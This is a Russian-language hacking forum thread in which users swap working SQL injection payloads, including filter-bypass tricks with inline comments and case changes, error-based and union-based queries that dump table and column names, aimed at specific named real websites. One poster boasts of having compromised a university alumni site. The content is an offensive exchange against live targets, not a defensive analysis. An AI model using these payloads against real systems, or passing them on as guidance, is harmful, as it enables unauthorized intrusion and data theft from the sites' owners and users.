 |
|
05.02.2014, 18:26
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от WallHack
Фильтруется from
Такой запрос проходит -1%27+/*!union*/+SeLect+1/*!,*/version%28%29/*!,*/3/*!,*/4+--+
Такой не проходит -1%27+/*!union*/+SeLect+1/*!,*/password/*!,*/3/*!,*/4+/*!FrOm*/+--+
Как можно обойти фильтр ?
1. FRFROMOM
2. POST
2. From находится в связке с union, select, пробелом и т.д.
|
|
|
05.02.2014, 22:17
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от YaBtr
Уязвимый параметр
year
:
5.1.70-log
Далее на пути стоит sweb, обходите путем изменения регистра.
Тьфу, ёпрст, я уж думал это вопрос Ну а раз нет ссылки погуглил, нашел и крутанул сайт
Код:
Красноярский государственный медицинский университет - Клуб выпускников
...бывает)))
П.С. Извиняюсь за офф.топ
|
|
|
|
06.02.2014, 00:26
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от GhostW
Тьфу, ёпрст, я уж думал это вопрос
Ну а раз нет ссылки погуглил, нашел и крутанул сайт
Код:
Красноярский государственный медицинский университет - Клуб выпускников
...бывает)))
П.С. Извиняюсь за офф.топ а я как раз думал, кто его похекал... но теперь и логи есть и IP и признание хацкера на форуме, пора подшивать дело!))) начальство и прокуратура будет довольна
Сообщение от GhostW
П.С. Извиняюсь за офф.топ
да, не... молодец, все норм)))
|
|
|
|
06.02.2014, 02:48
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от winstrool
а я как раз думал, кто его похекал... но теперь и логи есть и IP и признание хацкера на форуме, пора подшивать дело!))) начальство и прокуратура будет довольна
да, не... молодец, все норм)))
Админам на почту отписал так что не надо ля-ля...
|
|
|
|
06.02.2014, 18:01
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
http://www.sailorjob.com.ua/show_firm/?id=482+order+by+1+--+
|
|
|
|
06.02.2014, 18:06
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от Unknowhacker
http://www.sailorjob.com.ua/show_firm/?id=482+order+by+1+--+
Что с этим сделать надо?
Если раскрутить, то вот.
http://www.sailorjob.com.ua/show_firm/?id=482%27and(select+1+from(select+count(*),concat ((select+table_name+from+information_schema.tables +limit+0,1),floor(rand(0)*2))x+from+information_sc hema.tables+group+by+x)a)--+g
|
|
|
|
07.02.2014, 16:55
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Почему не выводит имя таблиц(ы)?
Код:
www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+
|
|
|
|
07.02.2014, 17:06
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от Shade
Почему не выводит имя таблиц(ы)?
Код:
www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+
http://www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,(select(@x)from(select(@x:=0x00 ),(select(null)from(information_schema.columns)whe re(table_schema!=0x696e666f726d6174696f6e5f7363686 56d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_s chema,0x2e,table_name,0x3a,column_name))))x),3,4,5 ,6,7,8,9,10,11+--+
|
|
|
|
07.02.2014, 17:11
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от Shade
Почему не выводит имя таблиц(ы)?
Код:
www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+
hex(table_name) )
|
|
|
|
07.02.2014, 19:38
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Код:
http://www.muzgid.ua/ru/news/info-42.html
- уязвимое поле поиска. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
